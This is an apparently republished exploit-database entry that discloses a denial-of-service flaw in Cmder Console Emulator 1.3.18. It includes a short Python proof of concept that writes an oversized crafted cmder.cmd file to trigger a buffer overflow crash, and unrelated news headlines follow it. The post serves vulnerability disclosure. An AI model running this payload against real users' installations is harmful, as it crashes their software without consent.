Cmder Console Emulator version 1.3.18 suffers from a denial of service vulnerability.
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10 # [About - Cmder Console Emulator] :
#Cmder is a software package created over absence of usable console emulator on Windows.
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
# [Security Issue] :
#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
#E.g λ cmder.cmd
# [POC] :
PAYLOAD=chr(235) + "CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
f.write(PAYLOAD)
Related posts:
Details, Video Emerge In San Francisco Police Fatal Shooting Of Ajmal Amani In SoMa Residential Hote...
Critical Bugs Threaten to Crack Atlassian Confluence Workspaces Wide Open
Takeaways from the latest controversial and contentious Supreme Court term
Customize the Windows 11 experience with these free apps
Over 16,500 Sites Hacked to Distribute Malware via Web Redirect Service